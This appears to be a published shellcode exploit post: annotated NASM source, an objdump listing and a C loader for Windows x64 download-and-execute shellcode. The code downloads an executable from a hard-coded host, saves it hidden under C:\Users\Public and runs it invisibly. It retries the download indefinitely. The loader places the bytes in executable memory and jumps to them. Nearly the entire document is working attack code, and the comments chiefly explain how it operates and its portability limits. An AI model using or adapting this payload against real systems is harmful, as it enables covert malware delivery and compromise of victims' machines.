	# Title : Windows x64 Download+Execute Shellcode
	# Author : Roziul Hasan Khan Shifat
	# Date : 24-11-2016
	# size : 358 bytes
	# Tested on : Windows 7 x64 Professional
	# Email :  



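section .text
	global _start

; Windows x64 download-and-execute shellcode (NASM syntax, Microsoft x64 ABI).
;
; Flow: walk the PEB loader list to kernel32.dll, resolve kernel32 exports by a
; fixed index into its AddressOfFunctions table, LoadLibraryA("urlmon"),
; GetProcAddress(urlmon, "URLDownloadToFileA"), download the hard-coded URL to
; C:\Users\Public\p.exe, mark the file hidden, WinExec() it with SW_HIDE, exit.
;
; Register roles (all callee-saved under the MS x64 ABI, which is why they
; survive the five indirect calls without any spills):
;   rdi = kernel32.dll image base
;   rsi = kernel32 AddressOfFunctions table (VA)
;   rbx = address of the export about to be called
;   r14 = scratch buffer holding the strings passed to the APIs
;   r15 = URLDownloadToFileA
;   rdx = zero / export index / second argument (volatile scratch)
; Nothing is saved on entry, so when the code is dropped into another process
; the host's rbx/rsi/rdi/r14/r15 are destroyed (see the injection note below).
;
; Encoding: the byte stream is null-free (see the objdump listing that follows),
; which is why zeros come from `xor rdx,rdx`/`mov [..],byte dl`, the PEB is read
; through `[gs:rdx+0x60]`, and indices are loaded with 16-bit `mov dx,imm16`
; (a 32-bit immediate would embed 00 bytes).
;
; Portability caveat: the export indices 831, 586, 1131, 1314 and 296 are
; positions in the AddressOfFunctions table of the kernel32.dll build this was
; tested on (Windows 7 x64). That table differs between Windows versions and
; updates, so on any other kernel32 build the wrong function is called. A
; name- or hash-based export lookup is the usual fix.
;
; Stack caveat: every frame is 88 bytes, which is 8 mod 16, so alignment at the
; call sites alternates. Entered via `call` (rsp == 8 mod 16) only the
; URLDownloadToFileA call and the final exit call see a 16-byte aligned rsp;
; LoadLibraryA, GetProcAddress, SetFileAttributesA and WinExec are called
; misaligned. Windows 7 tolerated that; do not rely on it elsewhere.
;
; The instruction sequence below is byte-for-byte the one in the 358-byte
; objdump listing; only the `_start:` and `download:` labels and the `lodsq`,
; all present in that listing but dropped from this source, have been restored.

bits 64

_start:
; Two 88-byte frames: r14 points at the upper one, used as the string buffer
; (at most 25 + 29 = 54 bytes are written into it); the lower one is the
; shadow space / working frame for the first two calls.
sub rsp,88

lea r14,[rsp]
sub rsp,88


xor rdx,rdx
mov rax,[gs:rdx+0x60] ;PEB (TEB+0x60), read with rdx=0 to avoid a 00 byte in the encoding
mov rsi,[rax+0x18] ;PEB.Ldr
mov rsi,[rsi+0x10] ;Ldr+0x10 = InLoadOrderModuleList.Flink (not InMemoryOrder, which is +0x20);
                   ;the +0x30 DllBase offset below is relative to the InLoadOrder links
lodsq              ;rax = 1st entry (the exe) .Flink -> 2nd entry (ntdll.dll)
mov rsi,[rax]      ;rsi = 2nd entry .Flink -> 3rd entry, kernel32.dll on Windows 7
mov rdi,[rsi+0x30] ;kernel32.dll base address (LDR_DATA_TABLE_ENTRY.DllBase)


mov ebx,[rdi+0x3c] ;IMAGE_DOS_HEADER.e_lfanew (32-bit load zero-extends into rbx)
add rbx,rdi        ;rbx = IMAGE_NT_HEADERS64
mov dl,0x88        ;0x18 (OptionalHeader) + 0x70 (DataDirectory[EXPORT]) in the 64-bit headers
mov ebx,[rbx+rdx]  ;export directory RVA
add rbx,rdi        ;rbx = IMAGE_EXPORT_DIRECTORY

mov esi,[rbx+0x1c] ;IMAGE_EXPORT_DIRECTORY.AddressOfFunctions (RVA)
add rsi,rdi        ;rsi = AddressOfFunctions VA, kept for every lookup below

;loading urlmon.dll

mov dx,831         ;table index of LoadLibraryA on the tested kernel32 (rdx upper bits are still 0)
mov ebx,[rsi+rdx*4]
add rbx,rdi

xor rdx,rdx

mov [r14],dword 'urlm'
mov [r14+4],word 'on'
mov [r14+6],byte dl ;NUL terminator -> "urlmon"

lea rcx,[r14]      ;lpLibFileName

call rbx           ;rax = HMODULE of urlmon.dll (not checked; a NULL here crashes GetProcAddress)

mov dx,586         ;table index of GetProcAddress on the tested kernel32
mov ebx,[rsi+rdx*4]
add rbx,rdi

xor rdx,rdx

mov rcx,'URLDownl'
mov [r14],rcx
mov rcx,'oadToFil'
mov [r14+8],rcx
mov [r14+16],word 'eA'
mov [r14+18],byte dl ;NUL terminator -> "URLDownloadToFileA"

lea rdx,[r14]      ;lpProcName
mov rcx,rax        ;hModule = urlmon.dll

call rbx

mov r15,rax        ;r15 = URLDownloadToFileA (not checked for NULL)

;save as 'C:\\Users\\Public\\p.exe' length: 24+1
; NASM single-quoted strings do not process escapes, so the buffer literally
; contains doubled backslashes (5c 5c in the listing; 24 bytes as counted
; above). Win32 path normalisation collapses repeated separators, which is
; why the path still resolves. C:\Users\Public is writable by every
; interactive user and a well-known drop location for detection rules.

mov rax,'C:\\User'
mov [r14],rax
mov rax,'s\\Publi'
mov [r14+8],rax
mov rax,'c\\p.exe'
mov [r14+16],rax

xor rdx,rdx
mov [r14+24],byte dl ;NUL terminator


lea rcx,[r14+25]   ;the URL is stored directly after the path

;url "http://192.168.10.129/pl.exe" length: 28+1

mov rax,'http://1'
mov [rcx],rax
mov rax,'92.168.1'
mov [rcx+8],rax
mov rax,'0.129/pl'
mov [rcx+16],rax
mov [rcx+24],dword '.exe'
mov [rcx+28],byte dl ;NUL terminator


sub rsp,88         ;third frame: 32-byte shadow space plus the 5th-argument slot at [rsp+32]

download:
; HRESULT URLDownloadToFileA(pCaller=NULL, szURL, szFileName, dwReserved=0, lpfnCB=NULL)
xor rcx,rcx
lea rdx,[r14+25]
lea r8,[r14]
xor r9,r9
mov [rsp+32],r9    ;5th argument lives on the stack just above the shadow space

call r15

xor rdx,rdx
cmp rax,rdx
jnz download       ;retry until S_OK. There is no retry limit and no back-off: if the
                   ;server is unreachable the download is re-attempted indefinitely
                   ;and the code never reaches the exit below.

sub rsp,88         ;fourth frame (only one of the four is released at the end)
;hiding file

mov dx,1131
mov ebx,[rsi+rdx*4]
add rbx,rdi ;SetFileAttributesA()

lea rcx,[r14]      ;lpFileName = path
xor rdx,rdx
mov dl,2           ;dwFileAttributes = FILE_ATTRIBUTE_HIDDEN

call rbx           ;return value ignored

;executing file
xor rdx,rdx
mov dx,1314
mov ebx,[rsi+rdx*4]
add rbx,rdi ;WinExec()

lea rcx,[r14]      ;lpCmdLine = path (unquoted; harmless here because it has no spaces)

xor rdx,rdx        ;uCmdShow = 0 (SW_HIDE)

call rbx           ;return value ignored

xor rdx,rdx
mov dx,296         ;presumably ExitProcess on the tested build: it is called with a single
mov ebx,[rsi+rdx*4] ;zero argument and nothing follows the call -- confirm against that
add rbx,rdi        ;kernel32's export table before reusing the index


;if U use this shellcode for pe injection, then don't forget to free allocated space
; NOTE(review): the single `add rsp,88` below undoes only one of the four
; 88-byte frames (264 bytes stay allocated), and the clobbered callee-saved
; registers are never restored. Both must be fixed before the code can
; return into a host process instead of exiting it.

add rsp,88
xor rcx,rcx        ;uExitCode = 0
call rbx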



Disassembly of section .text:

0000000000000000 <_start>:
   0:	48 83 ec 58          	sub    $0x58,%rsp
   4:	4c 8d 34 24          	lea    (%rsp),%r14
   8:	48 83 ec 58          	sub    $0x58,%rsp
   c:	48 31 d2             	xor    %rdx,%rdx
   f:	65 48 8b 42 60       	mov    %gs:0x60(%rdx),%rax
  14:	48 8b 70 18          	mov    0x18(%rax),%rsi
  18:	48 8b 76 10          	mov    0x10(%rsi),%rsi
  1c:	48 ad                	lods   %ds:(%rsi),%rax
  1e:	48 8b 30             	mov    (%rax),%rsi
  21:	48 8b 7e 30          	mov    0x30(%rsi),%rdi
  25:	8b 5f 3c             	mov    0x3c(%rdi),%ebx
  28:	48 01 fb             	add    %rdi,%rbx
  2b:	b2 88                	mov    $0x88,%dl
  2d:	8b 1c 13             	mov    (%rbx,%rdx,1),%ebx
  30:	48 01 fb             	add    %rdi,%rbx
  33:	8b 73 1c             	mov    0x1c(%rbx),%esi
  36:	48 01 fe             	add    %rdi,%rsi
  39:	66 ba 3f 03          	mov    $0x33f,%dx
  3d:	8b 1c 96             	mov    (%rsi,%rdx,4),%ebx
  40:	48 01 fb             	add    %rdi,%rbx
  43:	48 31 d2             	xor    %rdx,%rdx
  46:	41 c7 06 75 72 6c 6d 	movl   $0x6d6c7275,(%r14)
  4d:	66 41 c7 46 04 6f 6e 	movw   $0x6e6f,0x4(%r14)
  54:	41 88 56 06          	mov    %dl,0x6(%r14)
  58:	49 8d 0e             	lea    (%r14),%rcx
  5b:	ff d3                	callq  *%rbx
  5d:	66 ba 4a 02          	mov    $0x24a,%dx
  61:	8b 1c 96             	mov    (%rsi,%rdx,4),%ebx
  64:	48 01 fb             	add    %rdi,%rbx
  67:	48 31 d2             	xor    %rdx,%rdx
  6a:	48 b9 55 52 4c 44 6f 	movabs $0x6c6e776f444c5255,%rcx
  71:	77 6e 6c 
  74:	49 89 0e             	mov    %rcx,(%r14)
  77:	48 b9 6f 61 64 54 6f 	movabs $0x6c69466f5464616f,%rcx
  7e:	46 69 6c 
  81:	49 89 4e 08          	mov    %rcx,0x8(%r14)
  85:	66 41 c7 46 10 65 41 	movw   $0x4165,0x10(%r14)
  8c:	41 88 56 12          	mov    %dl,0x12(%r14)
  90:	49 8d 16             	lea    (%r14),%rdx
  93:	48 89 c1             	mov    %rax,%rcx
  96:	ff d3                	callq  *%rbx
  98:	49 89 c7             	mov    %rax,%r15
  9b:	48 b8 43 3a 5c 5c 55 	movabs $0x726573555c5c3a43,%rax
  a2:	73 65 72 
  a5:	49 89 06             	mov    %rax,(%r14)
  a8:	48 b8 73 5c 5c 50 75 	movabs $0x696c6275505c5c73,%rax
  af:	62 6c 69 
  b2:	49 89 46 08          	mov    %rax,0x8(%r14)
  b6:	48 b8 63 5c 5c 70 2e 	movabs $0x6578652e705c5c63,%rax
  bd:	65 78 65 
  c0:	49 89 46 10          	mov    %rax,0x10(%r14)
  c4:	48 31 d2             	xor    %rdx,%rdx
  c7:	41 88 56 18          	mov    %dl,0x18(%r14)
  cb:	49 8d 4e 19          	lea    0x19(%r14),%rcx
  cf:	48 b8 68 74 74 70 3a 	movabs $0x312f2f3a70747468,%rax
  d6:	2f 2f 31 
  d9:	48 89 01             	mov    %rax,(%rcx)
  dc:	48 b8 39 32 2e 31 36 	movabs $0x312e3836312e3239,%rax
  e3:	38 2e 31 
  e6:	48 89 41 08          	mov    %rax,0x8(%rcx)
  ea:	48 b8 30 2e 31 32 39 	movabs $0x6c702f3932312e30,%rax
  f1:	2f 70 6c 
  f4:	48 89 41 10          	mov    %rax,0x10(%rcx)
  f8:	c7 41 18 2e 65 78 65 	movl   $0x6578652e,0x18(%rcx)
  ff:	88 51 1c             	mov    %dl,0x1c(%rcx)
 102:	48 83 ec 58          	sub    $0x58,%rsp

0000000000000106 <download>:
 106:	48 31 c9             	xor    %rcx,%rcx
 109:	49 8d 56 19          	lea    0x19(%r14),%rdx
 10d:	4d 8d 06             	lea    (%r14),%r8
 110:	4d 31 c9             	xor    %r9,%r9
 113:	4c 89 4c 24 20       	mov    %r9,0x20(%rsp)
 118:	41 ff d7             	callq  *%r15
 11b:	48 31 d2             	xor    %rdx,%rdx
 11e:	48 39 d0             	cmp    %rdx,%rax
 121:	75 e3                	jne    106 <download>
 123:	48 83 ec 58          	sub    $0x58,%rsp
 127:	66 ba 6b 04          	mov    $0x46b,%dx
 12b:	8b 1c 96             	mov    (%rsi,%rdx,4),%ebx
 12e:	48 01 fb             	add    %rdi,%rbx
 131:	49 8d 0e             	lea    (%r14),%rcx
 134:	48 31 d2             	xor    %rdx,%rdx
 137:	b2 02                	mov    $0x2,%dl
 139:	ff d3                	callq  *%rbx
 13b:	48 31 d2             	xor    %rdx,%rdx
 13e:	66 ba 22 05          	mov    $0x522,%dx
 142:	8b 1c 96             	mov    (%rsi,%rdx,4),%ebx
 145:	48 01 fb             	add    %rdi,%rbx
 148:	49 8d 0e             	lea    (%r14),%rcx
 14b:	48 31 d2             	xor    %rdx,%rdx
 14e:	ff d3                	callq  *%rbx
 150:	48 31 d2             	xor    %rdx,%rdx
 153:	66 ba 28 01          	mov    $0x128,%dx
 157:	8b 1c 96             	mov    (%rsi,%rdx,4),%ebx
 15a:	48 01 fb             	add    %rdi,%rbx
 15d:	48 83 c4 58          	add    $0x58,%rsp
 161:	48 31 c9             	xor    %rcx,%rcx
 164:	ff d3                	callq  *%rbx



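#include <stdio.h>
#include <string.h>
#include <windows.h>

/*
 * Minimal loader for the shellcode above.
 *
 * The assembled bytes are not reproduced on this page: paste them here as a
 * "\x48\x83\xec\x58..." string, in the byte order of the objdump listing. The
 * shellcode is null-free, so strlen() measures its full length (358).
 *
 * WARNING: running this performs a live download from the hard-coded URL and
 * executes the result hidden. Run it only inside an isolated lab VM.
 */
char shellcode[] = "";

/*
 * Copies the shellcode into an executable page and jumps to it.
 *
 * The original harness called shellcode[] in place. That array lives in a
 * read/write, non-executable data section, and DEP cannot be disabled for
 * 64-bit processes, so the call faults before the shellcode runs; the bytes
 * are therefore copied into a PAGE_EXECUTE_READWRITE allocation first.
 *
 * Returns 0 only if the shellcode returns (it normally exits the process),
 * 1 when no bytes were compiled in or the allocation fails.
 */
int main(void)
{
    size_t len = strlen(shellcode);
    void *exec_mem;

    printf("shellcode length : %d\n", (int)len);
    if (len == 0) {
        fprintf(stderr, "no shellcode bytes compiled in\n");
        return 1;
    }

    exec_mem = VirtualAlloc(NULL, len, MEM_COMMIT | MEM_RESERVE,
                            PAGE_EXECUTE_READWRITE);
    if (exec_mem == NULL) {
        fprintf(stderr, "VirtualAlloc failed: %lu\n", GetLastError());
        return 1;
    }
    memcpy(exec_mem, shellcode, len);

    /* Does not return on success: the shellcode ends by exiting the process. */
    ((void (*)(void))exec_mem)();

    return 0;
}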